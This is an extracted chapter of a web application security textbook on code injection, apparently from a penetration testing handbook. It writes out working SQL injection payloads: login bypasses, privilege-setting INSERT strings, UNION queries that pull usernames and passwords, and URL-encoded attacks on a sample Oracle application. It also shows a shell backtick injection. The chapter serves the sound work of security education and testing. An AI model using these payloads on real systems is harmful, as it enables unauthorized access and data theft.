70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 237

Injecting into Interpreted Languages

An interpreted language is one whose execution involves a runtime compo-

nent that interprets the code of the language and carries out the instructions

that it contains. In contrast to this, a compiled language is one whose code is

converted into machine instructions at the time of generation; at runtime,

these instructions are then executed directly by the processor of the computer

that is running it.

In principle, any language can be implemented using either an interpreter

or a compiler, and the distinction is not an inherent property of the language

itself. Nevertheless, most languages are normally implemented in only one of

these two ways, and many of the core languages used in the development of

web applications are implemented using an interpreter, including SQL, LDAP,

Perl, and PHP.

Because of the way that interpreted languages are executed, there arises a

family of vulnerabilities known as code injection. In any useful application,

user-supplied data will be received, manipulated, and acted upon. The code

that is processed by the interpreter will, therefore, comprise a mix of the

instructions written by the programmer and the data supplied by the user. In

some situations, an attacker can supply crafted input that breaks out of the

data context, usually by supplying some syntax that has a special significance

within the grammar of the interpreted language being used. The result is that

part of this input gets interpreted as program instructions, which are executed

in the same way as if they had been written by the original programmer. Often,

therefore, a successful attack will fully compromise the component of the

application that is being targeted.

In compiled languages, on the other hand, attacks designed to execute arbi-

trary commands are usually very different. The method for injecting code does

not normally leverage any syntactic feature of the language used to develop

the target program, and the injected payload normally contains machine code

rather than instructions written in that language. See Chapter 15 for details of

common attacks against compiled software.

Consider the following very simple example. Helloworld is a shell script

that prints out a message supplied by the user:

#!/bin/bash

echo $1

When used in the way the programmer intended, this script simply takes the

input supplied by the user and passes this to the echo command, for example:

[manicsprout@localhost ~]$ ./helloworld.sh “hello there”

hello there

238 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 238

However, the shell scripting environment in which Helloworld is inter-

preted supports the use of backticks to insert the output of a different com-

mand within an item of data. Hence, an attacker can inject arbitrary script

commands, and retrieve their output, as follows:

[manicsprout@localhost ~]$ ./helloworld.sh “`ls -la`”

total 28 drwxr-xr-x 2 manicsprout manicsprout 4096 Dec 4 00:22 .

drwxr-xr-x 3 root root 4096 Dec 4 00:19 .. -rw-r--r-- 1 manicsprout

manicsprout 24 Dec 4 00:19 .bash_logout -rw-r--r-- 1 manicsprout

manicsprout 191 Dec 4 00:19 .bash_profile -rw-r--r-- 1 manicsprout

manicsprout 124 Dec 4 00:19 .bashrc -rw------- 1 manicsprout manicsprout

706 Dec 4 00:22 .viminfo -rw-rw-r-- 1 manicsprout manicsprout 8 Dec 4

00:22 helloworld.sh

Although this example is somewhat trivial, if the vulnerable script were exe-

cuting as root, an attacker could leverage it to escalate privileges and execute

commands in the context of the root user. As you will see, this exact vulnera-

bility is still often found in web applications that interface with the operating

system command shell.

HACK STEPS

Injection into interpreted languages is a very broad topic, encompassing many

different kinds of vulnerability and potentially affecting every component of a

web application’s supporting infrastructure. The detailed steps for detecting

and exploiting code injection flaws are dependent upon the language that is

being targeted and the programming techniques employed by the application’s

developers. In every instance, however, the generic approach is as follows:

■ Supply unexpected syntax that may cause problems within the context of

the particular interpreted language.

■ Identify any anomalies in the application’s response that may indicate

the presence of a code injection vulnerability.

■ If any error messages are received, examine these to obtain evidence

about the problem that occurred on the server.

■ If necessary, systematically modify your initial input in relevant ways

in an attempt to confirm or disprove your tentative diagnosis of a

vulnerability.

■ Construct a proof-of-concept test that causes a safe command to be exe-

cuted in a verifiable way, to conclusively prove that an exploitable code

injection flaw exists.

■ Exploit the vulnerability by leveraging the functionality of the target lan-

guage and component to achieve your objectives.

Chapter 9 ■ Injecting Code 239

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 239

Injecting into SQL

Almost every web application employs a database to store the various kinds of

information that it needs in order to operate. For example, a web application

deployed by an online retailer might use a database to store the following

information:

■■

User accounts, credentials, and personal information

■■

Descriptions and prices of goods for sale

■■

Orders, account statements, and payment details

■■

The privileges of each user within the application

The means of accessing information within the database is Structured Query

Language, or SQL. SQL can be used to read, update, add, and delete informa-

tion held within the database.

SQL is an interpreted language, and web applications commonly construct

SQL statements that incorporate user-supplied data. If this is done in an unsafe

way, then the application may be vulnerable to SQL injection. This flaw is one

of the most notorious vulnerabilities to have afflicted web applications. In the

most serious cases, SQL injection can enable an anonymous attacker to read

and modify all data stored within the database, and even take full control of

the server on which the database is running.

As awareness of web application security has evolved, SQL injection vul-

nerabilities have become gradually less widespread, and more difficult to

detect and exploit. A few years ago, it was very common to encounter SQL

injection vulnerabilities that could be detected simply by entering an apostro-

phe into a HTML form field, and reading the verbose error message that the

application returned. Today, vulnerabilities are more likely to be tucked away

in data fields that users cannot normally see or modify, and error messages are

likely to be generic and uninformative. As this trend has developed, methods

for finding and exploiting SQL injection flaws have evolved, using more sub-

tle indicators of vulnerabilities, and more refined and powerful exploitation

techniques. We will begin by examining the most basic cases and then go on to

describe the latest techniques for blind detection and exploitation.

There is a very wide range of databases in use to support web applications.

While the fundamentals of SQL injection are common to the vast majority of

these, there are many differences. These range from minor variations in syntax

through to significant divergences in behavior and functionality that can affect

the types of attack that you can pursue. For reasons of space and sanity, we

will restrict our actual examples to the three most common databases you are

likely to encounter, namely Oracle, MS-SQL, and MySQL. Wherever applica-

ble, we will draw attention to the differences between these three platforms.

240 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 240

Equipped with the techniques we describe here, you should be able to identify

and exploit SQL injection flaws against any other database, by performing

some quick additional research.

TIP In many situations, you will find it extremely useful to have access to a

local installation of the same database that is being used by the application

you are targeting. You will often find that you need to tweak a piece of syntax,

or consult a built-in table or function, to achieve your objectives. The responses

you receive from the target application will often be incomplete or cryptic,

requiring some detective work to understand. All of this is much easier if you

can cross-reference with a fully transparent working version of the database in

question.

If this is not feasible, a good alternative is to find a suitable interactive online

environment that you can experiment on, such as the interactive tutorials at

SQLzoo.net.

Exploiting a Basic Vulnerability

Consider a web application deployed by a book retailer that enables users to

search for products based on author, title, publisher, and so on. The entire book

catalog is held within a database, and the application uses SQL queries to

retrieve details of different books based on the search terms supplied by users.

When a user searches for all books published by Wiley, the application per-

forms the following query:

SELECT author,title,year FROM books WHERE publisher = ‘Wiley’

This query causes the database to check every row within the books table,

extract each of the records where the

publisher column has the value Wiley,

and return the set of all these records. This record set is then processed by the

application and presented to the user within an HTML page.

In this query, the words to the left of the equals sign comprise SQL key-

words and the names of tables and columns within the database. All of this

portion of the query was constructed by the programmer at the time the appli-

cation was created. The expression

Wiley, of course, is supplied by the user,

and its significance is as an item of data. String data in SQL queries must be

encapsulated within single quotation marks, to separate it from the rest of the

query.

Chapter 9 ■ Injecting Code 241

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 241

Now, consider what happens when a user searches for all books published

by O’Reilly. This causes the application to perform the following query:

SELECT author,title,year FROM books WHERE publisher = ‘O’Reilly’

In this case, the query interpreter reaches the string data in the same way as

before. It parses this data, which is encapsulated within single quotation

marks, and obtains the value

O. It then encounters the expression Reilly’,

which is not valid SQL syntax and so generates an error:

Incorrect syntax near ‘Reilly’.

Server: Msg 105, Level 15, State 1, Line 1

Unclosed quotation mark before the character string ‘

When an application behaves in this way, it is wide open to SQL injection.

An attacker can supply input containing a quotation mark to terminate the

string that he controls, and can then write arbitrary SQL to modify the query

that the developer intended the application to execute. In this situation, for

example, the attacker can modify the query to return every single book in the

retailer’s catalog, by entering the search term:

Wiley’ OR 1=1--

This causes the application to perform the following query:

SELECT author,title,year FROM books WHERE publisher = ‘Wiley’ OR 1=1--‘

This modifies the WHERE clause of the developer’s query to add a second con-

dition. The database will check every row within the books table and extract

each record where the

publisher column has the value Wiley or where 1 is

equal to 1. Because 1 is always equal to 1, the database will return every record

within the books table.

NOTE In the example shown, the double hyphen in the attacker’s input is a

meaningful expression in SQL that tells the query interpreter that the remainder

of the line is a comment and should be ignored. This trick is extremely useful in

some SQL injection attacks, because it enables you to ignore the remainder of

the query created by the application developer. In the example, the application

is encapsulating the user-supplied string in single quotation marks. Because

the attacker has terminated the string he controls and injected some additional

SQL, he needs to handle the trailing quotation mark, to avoid a syntax error

occurring as in the O’Reilly example. He achieves this by adding a double

hyphen, causing the remainder of the query to be treated as a comment. In

MySQL, you will need to include a space after the double hyphen, or use a

hash character to specify a comment.

242 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 242

TIP In some situations, an alternative way to handle the trailing quotation

mark without using the comment symbol is to “balance the quotes” by

concluding the injected input with an item of string data that requires a trailing

quote to encapsulate it. For example, entering the search term

Wiley’ OR ‘a’ = ‘a

will result in the query

SELECT author,title,year FROM books WHERE publisher = ‘Wiley’ OR ‘a’=’a’

which is perfectly valid and achieves the same result as the 1 = 1 attack.

The previous example may appear to have little security impact, because

users can probably access all book details using entirely legitimate means.

However, we will describe shortly how many SQL injection flaws like this can

be used to extract arbitrary data from different database tables, and to escalate

privileges within the database and the database server. For this reason, any

SQL injection vulnerability should be regarded as extremely serious, regard-

less of its precise context within the application’s functionality.

Bypassing a Login

In some situations, a simple SQL injection vulnerability may have an immedi-

ately critical impact, regardless of any further attacks that could be built upon

it. Many applications that implement a forms-based login function use a data-

base to store user credentials and perform a simple SQL query to validate each

SELECT * FROM users WHERE username = ‘marcus’ and password = ‘secret’

This query causes the database to check every row within the users table

and extract each record where the

username column has the value marcus and

the

password column has the value secret. If a user’s details are returned to

the application, then the login attempt is successful, and the application cre-

ates an authenticated session for that user.

As with the search function, an attacker can inject into either the username

or the password field to modify the query performed by the application, and

so subvert its logic. For example, if an attacker knows that the username of the

application administrator is

admin, he can log in as that user by supplying any

password and the following username:

admin’--

This causes the application to perform the following query:

SELECT * FROM users WHERE username = ‘admin’--‘ AND password = ‘foo’

Chapter 9 ■ Injecting Code 243

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 243

which because of the comment symbol is equivalent to

SELECT * FROM users WHERE username = ‘admin’

and so the password check has been bypassed altogether.

Suppose that the attacker does not know the username of the administrator.

In most applications, the first account in the database is an administrative user,

because this account is normally created manually and then used to generate

all other accounts via the application. Further, if the query returns the details

for more than one user, most applications will simply process the first user

whose details are returned. An attacker can often exploit this behavior to log in

as the first user in the database by supplying the username:

‘ OR 1=1--

This causes the application to perform the query

SELECT * FROM users WHERE username = ‘’ OR 1=1--‘ AND password = ‘foo’

which because of the comment symbol is equivalent to

SELECT * FROM users WHERE username = ‘’ OR 1=1

which will return the details of all application users.

Finding SQL Injection Bugs

In the most obvious cases, a SQL injection flaw may be discovered and con-

clusively verified by supplying a single item of unexpected input to the appli-

cation. In other cases, bugs may be extremely subtle and may be difficult to

distinguish from other categories of vulnerability or from benign anomalies

that do not present any security threat. Nevertheless, there are various steps

that you can carry out in an ordered way to reliably verify the majority of SQL

injection flaws.

NOTE In your application mapping exercises (see Chapter 4), you should have

identified instances where the application appears to be accessing a back-end

database, and all of these need to be probed for SQL injection flaws. In fact,

absolutely any item of data submitted to the server may be passed to database

functions in ways that are not evident from the user’s perspective and may be

handled in an unsafe manner. You therefore need to probe every such item for

SQL injection vulnerabilities. This includes all URL parameters, cookies, items of

POST data, and HTTP headers. In all cases, a vulnerability may exist in the

handling of both the name and value of the relevant parameter.

244 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 244

Chapter 9 ■ Injecting Code 245

TIP When you are probing for SQL injection vulnerabilities, be sure to walk

through to completion any multistage processes in which you submit crafted

input, Applications frequently gather a collection of data across several

requests, and only persist this to the database once the complete set has been

gathered. In this situation, you will miss many SQL injection vulnerabilities if

you only submit crafted data within each individual request and monitor the

application’s response to that request.

String Data

When user-supplied string data is incorporated into an SQL query, it is encap-

sulated within single quotation marks. In order to exploit any SQL injection

flaw, you will need to break out of these quotation marks.

HACK STEPS

■ Submit a single quotation mark as the item of data you are targeting.

Observe whether an error occurs, or whether the result differs from

the original in any other way. If a detailed database error message is

received, consult the “SQL Syntax and Error Reference” section of this

chapter to understand its meaning.

■ If an error or other divergent behavior was observed, submit two single

quotation marks together. Databases use two single quotation marks as

an escape sequence to represent a literal single quote, so the sequence

is interpreted as data within the quoted string rather than the closing

string terminator. If this input causes the error or anomalous behavior to

disappear, then the application is probably vulnerable to SQL injection.

■ As a further verification that a bug is present, you can use SQL concate-

nator characters to construct a string that is equivalent to some benign

input. If the application handles your crafted input in the same way as it

does the corresponding benign input, then it is likely to be vulnerable.

Each type of database uses different methods for string concatenation.

The following examples can be injected to construct input that is equiva-

lent to FOO in a vulnerable application:

Oracle: ‘||’FOO

MS-SQL: ‘+’FOO

MySQL: ‘ ‘FOO [note there is a space between the two quotes]

TIP One way of confirming that the application is interacting with a back-end

database is to submit the SQL wildcard character % in a given parameter. For

example, submitting this in a search field often returns a large number of

results, indicating that the input is being passed into an SQL query. Of course,

this does not necessarily indicate that the application is vulnerable — only that

you should probe further to identify any actual flaws.

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 245

246 Chapter 9 ■ Injecting Code

Numeric Data

When user-supplied numeric data is incorporated into an SQL query, the

application may still handle this as string data, by encapsulating it within sin-

gle quotation marks. You should, therefore, always perform the steps

described previously for string data. In most cases, however, numeric data is

passed directly to the database in numeric form and so is not placed within

single quotation marks. If none of the previous tests points towards the pres-

ence of a vulnerability, there are some other specific steps you can take in rela-

tion to numeric data.

HACK STEPS

■ Try supplying a simple mathematical expression that is equivalent to the

original numeric value. For example, if the original value was 2, try sub-

mitting 1+1 or 3-1. If the application responds in the same way, then it

may be vulnerable.

■ The preceding test is most reliable in cases where you have confirmed

that the item being modified has a noticeable effect on the application’s

behavior. For example, if the application uses a numeric PageID parame-

ter to specify which content should be returned, then substituting 1+1 for

2 with equivalent results is a good sign that SQL injection is present. If,

however, you can place completely arbitrary input into a numeric para-

meter without changing the application’s behavior, then the preceding

test provides no evidence of a vulnerability.

■ If the first test is successful, you can obtain further evidence of the vul-

nerability by using more complicated expressions which use SQL-specific

keywords and syntax. A good example of this is the ASCII command,

which returns the numeric ASCII code of the supplied character. For

example, because the ASCII value of A is 65, the following expression is

equivalent to 2 in SQL:

67-ASCII(‘A’)

■ The previous test will not work if single quotes are being filtered; how-

ever in this situation you can exploit the fact that databases will implic-

itly convert numeric data to string data where required. Hence, because

the ASCII value of the character 1 is 49, the following expression is equiv-

alent to 2 in SQL:

51-ASCII(1)

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 246

TIP A common mistake made when probing an application for defects such

as SQL injection is to forget that certain characters have special meaning within

HTTP requests. If you wish to include these characters within your attack

payloads, then you must be careful to URL-encode them to ensure that they are

interpreted in the way you intend. In particular:

■■

& and = are used to join together name/value pairs to create the query

string and the block of POST data. You should encode them using %26

and %3d, respectively.

■■

Literal spaces are not allowed in the query string, and if submitted will

effectively terminate the entire string. You should encode them using +

or %20.

■■

Because + is used to encode spaces, if you wish to include an actual +

in your string, you must encode it using %2b. In the previous numeric

example, therefore, 1+1 should be submitted as 1%2b1.

■■

The semicolon is used to separate cookie fields, and should be

encoded using %3b.

These encodings are necessary whether you are editing the parameter’s value

directly from your browser, with an intercepting proxy, or through any other

means. If you fail to encode problem characters correctly, then you may

invalidate the entire request, or submit data that you did not intend to.

The steps described previously are normally sufficient to identify the major-

ity of SQL injection vulnerabilities, including many of those where no useful

results or error information is transmitted back to the browser. In some cases,

however, more advanced techniques may be necessary, such as the use of time

delays to confirm the presence of a vulnerability. We will describe these tech-

niques later in this chapter.

Injecting into Different Statement Types

The SQL language contains a number of verbs that may appear at the begin-

ning of statements. Because it is the most commonly used verb, the majority of

SQL injection vulnerabilities arise within

SELECT statements. Indeed, discus-

sions about SQL injection often give the impression that the vulnerability only

occurs in connection with

SELECT statements, because the examples used are

all of this type. However, SQL injection flaws can exist within any type of state-

ment, and there are some important considerations that you need to be aware

of in relation to each.

Chapter 9 ■ Injecting Code 247

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 247

Of course, when you are interacting with a remote application, it is not nor-

mally possible to know in advance what type of statement a given item of user

input will be processed by. However, you can usually make an educated guess

based upon the type of application function you are dealing with. The most

common types of SQL statements and their uses are described here.

SELECT Statements

SELECT statements are used to retrieve information from the database. They

are frequently employed in functions where the application returns informa-

tion in response to user actions, such as browsing a product catalog, viewing a

user’s profile, or performing a search. They are also often used in login func-

tions where user-supplied information is checked against data retrieved from

a database.

As in the previous examples, the entry point for SQL injection attacks is nor-

mally the

WHERE clause of the query, in which user-supplied items are passed to

the database to control the scope of the query’s results. Because the

WHERE

clause is usually the final component of a SELECT statement, this enables the

attacker to use the comment symbol to truncate the query to the end of his

input without invalidating the syntax of the overall query.

Occasionally, SQL injection vulnerabilities occur that affect other parts of the

SELECT query, such as the ORDER BY clause or the names of tables and columns.

INSERT Statements

INSERT statements are used to create a new row of data within a table. They are

commonly used when an application adds a new entry to an audit log, creates

a new user account, or generates a new order.

For example, an application may allow users to self-register, specifying their

own username and password, and may then insert the details into the

users

table with the following statement:

INSERT INTO users (username, password, ID, privs) VALUES (‘daf’,

‘secret’, 2248, 1)

If the username or password field is vulnerable to SQL injection, then an

attacker can insert arbitrary data into the table, including his own values for

and privs. However, to do so he must ensure that the remainder of the VALUES

clause is completed gracefully. In particular, it must contain the correct num-

ber of data items of the correct types. For example, injecting into the

username

field, the attacker can supply the following:

foo’, ‘bar’, 9999, 0)--

248 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 248

which will create an account with ID of 9999 and privs of 0. Assuming that the

privs field is used to determine account privileges, this may enable the

attacker to create an administrative user.

In some situations, when working completely blind, injecting into an

INSERT

statement may enable an attacker to extract string data from the application.

For example, the attacker could grab the version string of the database and

insert this into a field within his own user profile, which can be displayed back

to their browser in the normal way.

TIP When attempting to inject into an INSERT statement, you may not know

in advance how many parameters are required, or what their types are. In the

preceding situation, you can keep adding additional fields to the VALUES clause

until the desired user account is actually created. For example, when injecting

into the username field, you could submit the following:

foo’)--

foo’, 1)--

foo’, 1, 1)--

foo’, 1, 1, 1)--

Because most databases will implicitly cast an integer to a string, an integer

value can be used at each position — in this case resulting in an account with a

username of foo and a password of 1, regardless of which order the other

fields are in.

If you find that the value 1 is still rejected, you can try the value 2000, which

many databases will also implicitly cast to date-based data types.

UPDATE Statements

UPDATE statements are used to modify one or more existing rows of data within

a table. They are often used in functions where a user changes the value of data

that already exists — for example, updating her contact information, changing

her password, or changing the quantity on a line of an order.

A typical

UPDATE statement works in a similar way to an INSERT statement,

except that it usually contains a

WHERE clause to tell the database which rows of

the table to update. For example, when a user changes her password, the

application might perform the following query:

UPDATE users SET password=’newsecret’ WHERE user = ‘marcus’ and password

= ‘secret’

This query in effect verifies that the user’s existing password is correct

and, if so, updates it with the new value. If the function is vulnerable to SQL

Chapter 9 ■ Injecting Code 249

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 249

injection, then an attacker can bypass the existing password check and update

the password of the admin user by entering the following username:

admin’--

NOTE Probing for SQL injection vulnerabilities in a remote application is

always potentially dangerous, because you have no way of knowing in advance

quite what action the application will perform using your crafted input. In

particular, modifying the WHERE clause in an UPDATE statement can cause

changes to be made throughout a critical table of the database. For example, if

the attack just described had instead supplied the username

admin’ or 1=1--

then this would cause the application to execute the query

UPDATE users SET password=’newsecret’ WHERE user = ‘admin’ or 1=1

which resets the value of every user’s password!

Be aware that this risk exists even when you are attacking an application

function that does not appear to update any existing data, such as the main

performs various UPDATE queries using the supplied username, meaning that

any attack on the WHERE clause may be replicated in these other statements,

potentially wreaking havoc within the profiles of all application users. You

should ensure that the application owner accepts these unavoidable risks

before attempting to probe for or exploit any SQL injection flaws, and you

should also strongly encourage them to perform a full database backup

before you begin testing.

DELETE Statements

DELETE statements are used to delete one or more rows of data within a table,

for example when users remove an item from their shopping basket or delete

a delivery address from their personal details.

As with

UPDATE statements, a WHERE clause is normally used to tell the data-

base which rows of the table to update, and user-supplied data is most likely

to be incorporated into this clause. Subverting the intended

WHERE clause can

have far-reaching effects, and the same caution described for

UPDATE state-

ments applies to this attack.

The UNION Operator

The UNION operator is used in SQL to combine the results of two or more

SELECT statements into a single result set. When a web application contains a

250 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 250

SQL injection vulnerability that occurs in a SELECT statement, you can often

employ the

UNION operator to perform a second, entirely separate query, and

combine its results with those of the first. If the results of the query are

returned to your browser, then this technique can be used to easily extract arbi-

trary data from within the database.

Recall the application that enabled users to search for books based on

author, title, publisher, and other criteria. Searching for books published by

Wiley causes the application to perform the following query:

SELECT author,title,year FROM books WHERE publisher = ‘Wiley’

Suppose that this query returns the following set of results:

AUTHOR TITLE YEAR

Litchfield The Database Hacker’s Handbook 2005

Anley The Shellcoder’s Handbook 2007

You saw earlier how an attacker could supply crafted input to the search

function to subvert the

WHERE clause of the query and so return all of the books

held within the database. A far more interesting attack would be to use the

UNION operator to inject a second SELECT query and append its results to those

of the first. This second query can extract data from a different database table

altogether. For example, entering the search term

Wiley’ UNION SELECT username,password,uid FROM users--

will cause the application to perform the following query:

SELECT author,title,year FROM books WHERE publisher = ‘Wiley’

UNION

SELECT username,password,uid FROM users--‘

This returns the results of the original search followed by the contents of the

users table:

AUTHOR TITLE YEAR

Litchfield The Database Hacker’s Handbook 2005

Anley The Shellcoder’s Handbook 2007

admin r00tr0x 0

cliff Reboot 1

Chapter 9 ■ Injecting Code 251

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 251

NOTE When the results of two or more SELECT queries are combined using

the UNION operator, the column names of the combined result set are the same

as those returned by the first SELECT query. As shown in the preceding table ,

usernames appear in the author column and passwords appear in the title

column. This means that when the application processes the results of the

modified query, it has no way of detecting that the data returned has originated

from a different table altogether.

This simple example demonstrates the potentially huge power of the UNION

operator when employed in a SQL injection attack. However, before it can be

exploited in this way, two important provisos need to be considered:

■■

When the results of two queries are combined using the UNION operator,

the two result sets must have the same structure — that is, they must

contain the same number of columns, which have the same or compati-

ble data types, appearing in the same order.

■■

In order to inject a second query that will return interesting results, the

attacker needs to know the name of the database table that he wishes to

target, and the names of its relevant columns.

Let’s look a little deeper at the first of these provisos. Suppose that the

attacker attempts to inject a second query which returns an incorrect number

of columns. He supplies the input

Wiley’ UNION SELECT username,password FROM users--

The original query returns three columns, and the injected query only

returns two columns. Hence, the database returns the following error:

ORA-01789: query block has incorrect number of result columns

Suppose instead that the attacker attempts to inject a second query whose

columns have incompatible data types. He supplies the input

Wiley’ UNION SELECT uid,username,password FROM users--

This causes the database to attempt to combine the password column from

the second query (which contains string data) with the year column from the

first query (which contains numeric data). Because string data cannot be con-

verted into numeric data, this causes an error:

ORA-01790: expression must have same datatype as corresponding

expression

NOTE The error messages shown here are for Oracle. The equivalent

messages for other databases are listed in the “SQL Syntax and Error

Reference” section, later in this chapter.

252 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 252

Chapter 9 ■ Injecting Code 253

In many real-world cases, the database error messages shown will be

trapped by the application and will not be returned to the user’s browser. It

may appear, therefore, that in attempting to discover the structure of the first

query, you are restricted to pure guesswork. However, this is not the case.

There are three important points that mean that your task is normally easy:

■■

In order for the injected query to be capable of being combined with

the first, it is not strictly necessary that it contain the same data types.

Rather they must be compatible — that is, each data type in the second

query must either be identical to the corresponding type in the first or

be implicitly convertible to it. You have already seen that databases will

implicitly convert a numeric value to a string value. In fact, the value

NULL can be converted to any data type. Hence, if you do not know the

data type of a particular field, you can simply

SELECT NULL for that

field.

■■

In cases where database error messages are trapped by the application,

you can easily determine whether your injected query was executed. If

it has done so, then additional results will be added to those returned

by the application from its original query. This enables you to work sys-

tematically until you discover the structure of the query you need to

inject.

■■

In most cases, you can achieve your objectives simply by identifying a

single field within the original query that has a string data type. This is

sufficient for you to inject arbitrary queries that return string-based

data and retrieve the results, enabling you to systematically extract any

data from the database that you desire.

HACK STEPS

Your first task is to discover the number of columns returned by the original

query being executed by the application. There are two ways of achieving this:

■ You can exploit the fact that NULL is convertible to any data type to sys-

tematically inject queries with different numbers of columns, until your

injected query is executed, for example:

‘ UNION SELECT NULL--

‘ UNION SELECT NULL, NULL--

‘ UNION SELECT NULL, NULL, NULL--

When your query is executed, you have determined the number of

columns required. If database error messages are not being returned by

the application, you can still tell when your injected query was successful

because an additional row of data will be returned, containing either the

word NULL or an empty string.

Continued

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 253

254 Chapter 9 ■ Injecting Code

HACK STEPS (continued)

■ You can inject an ORDER BY clause into the original query and increment

the index of the ordering column until an error occurs. For example:

‘ ORDER BY 1--

‘ ORDER BY 2--

‘ ORDER BY 3--

Typically, the first few cases will return the same results as the original query

but in different orders. When an error occurs, you have specified an invalid

column number, and so have discovered the number of actual columns.

Having identified the required number of columns, your next task is to

discover a column that has a string data type, so that you can use this to extract

arbitrary data from the database. You can achieve this by injecting a query

containing NULLs as you did previously, and systematically replacing each NULL

with a. For example, if you know that the query must return three columns, you

can inject the following:

‘ UNION SELECT ‘a’, NULL, NULL--

‘ UNION SELECT NULL, ‘a’, NULL--

‘ UNION SELECT NULL, NULL, ‘a’--

When your query is executed, you will see an additional row of data

containing the value a. You can then use the relevant column to extract data

from the database.

NOTE In Oracle databases, every SELECT statement must include a FROM

attribute, and so injecting UNION SELECT NULL will produce an error

regardless of the number of columns. You can satisfy this requirement by

selecting from the globally accessible table DUAL. For example:

‘ UNION SELECT NULL FROM DUAL--

When you have identified the number of columns required in your injected

query, and have found a column which has a string data type, you are in a

position to extract arbitrary data. A simple proof-of-concept test is to extract

the version string of the database, which can be done on any DBMS. For exam-

ple, if there are three columns, and the first column can take string data, you

can extract the database version by injecting the following query on MS-SQL

and MySQL:

‘ UNION SELECT @@version,NULL,NULL--

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 254

Injecting the following query will achieve the same result on Oracle:

‘ UNION SELECT banner,NULL,NULL FROM v$version--

In the example of the vulnerable book search application, we can use this

string as a search term to retrieve the version of the Oracle database:

AUTHOR TITLE YEAR

CORE 9.2.0.1.0 Production

NLSRTL Version 9.2.0.1.0 - Production

Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production

PL/SQL Release 9.2.0.1.0 - Production

TNS for 32-bit Windows: Version 9.2.0.1.0 - Production

Of course, while the database’s version string may be interesting, and may

enable you to research vulnerabilities in the specific software being used, in

most cases you will be more interested in extracting actual data from the data-

base. To do this, you will typically need to address the second proviso

described earlier; that is, you need to know the name of the database table that

you wish to target and the names of its relevant columns. We will describe

techniques you can employ to achieve this shortly.

Fingerprinting the Database

Most of the techniques described so far are effective against all of the common

database platforms, and any divergences have been accommodated through

minor adjustments to syntax. However, as we begin to look at more advanced

exploitation techniques, the differences between platforms become more sig-

nificant, and you will increasingly need to know which type of back-end data-

base you are dealing with.

You have already seen how you can extract the version string of the major

database types. Even if this cannot be done for some reason, it is usually pos-

sible to fingerprint the database using other methods. One of the most reliable

is the different means by which databases concatenate strings. In a query

where you control some item of string data, you can supply a particular value

in one request and then test different methods of concatenation to produce that

string. When the same results are obtained, you have probably identified the

type of database being used. The following examples show how the string

services could be constructed on the common types of database:

■■

Oracle: ‘serv’||’ices’

Chapter 9 ■ Injecting Code 255

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 255

■■

MS-SQL: ‘serv’+’ices’

■■

MySQL: ‘serv’ ‘ices’ [note the space]

If you are injecting into numeric data, then the following attack strings can

be used to fingerprint the database. Each of these items will evaluate to 0 on

the target database and generate an error on the other databases:

■■

Oracle: BITAND(1,1)-BITAND(1,1)

■■

MS-SQL: @@PACK_RECEIVED-@@PACK_RECEIVED

■■

MySQL: CONNECTION_ID()-CONNECTION_ID()

NOTE The MS-SQL and Sybase databases share a common origin, so many

similarities exist in relation to table structure, global variables, and stored

procedures. In practice, the majority of the attack techniques against MS-SQL

described in later sections will work in an identical way against Sybase.

A further point of interest when fingerprinting databases is the way in

which MySQL handles certain types of inline comments. If a comment begins

with the exclamation point character followed by a database version string,

then the contents of the comment are interpreted as actual SQL, provided that

the version of the actual database is equal to or later than that string; other-

wise, the contents are ignored and treated as a comment. This facility can be

used by programmers in a similar way to preprocessor directives in C,

enabling them to write different code that will be processed conditionally

upon the database version being used. It can also be used by an attacker to fin-

gerprint the exact version of the database. For example, injecting the following

string will cause the

WHERE clause of a SELECT statement to be false if the

MySQL version in use is greater than or equal to 3.23.02:

/*!32302 and 1=0*/

Extracting Useful Data

In order to extract useful data from the database, you normally need to know

the names of the tables and columns containing the data you wish to access.

The main enterprise DBMS’s contain a rich amount of database metadata that

you can query to discover the names of every table and column within the

database. The methodology for extracting useful data is the same in each case;

however, the details differ on different database platforms. We will examine

examples of extracting useful data from Oracle and MS-SQL databases.

256 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 256

An Oracle Hack

Consider an HR application that allows users to perform employee searches. A

typical search employs the following URL:

https://wahh-app.com/employees.asp?EmpNo=7521

This search returns the following results:

ID EMPLOYEE JOB

7521 WARD SALESMAN

We attempt to perform a UNION attack, and so need to determine the

required number of columns used in the query (which may differ from the

number of columns returned in the application’s reponses). Injecting a query

that returns a single column results in an error message:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL%

20from%20dual--

[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result

columns

We continue adding additional NULLs to the injected query until no error

message is returned, and our query is executed:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

NULL,NULL,NULL%20from%20dual--

ID EMPLOYEE JOB

7521 WARD SALESMAN

Note the blank line which has now been added to the table, containing the

NULL results from our injected query.

Having determined the number of columns, we now need to find a column

which has a string data type. Our first attempt is unsuccessful:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20’a’,

NULL,NULL,NULL%20from%20dual--

[Oracle][ODBC][Ora]ORA-01790: expression must have same datatype as

corresponding expression

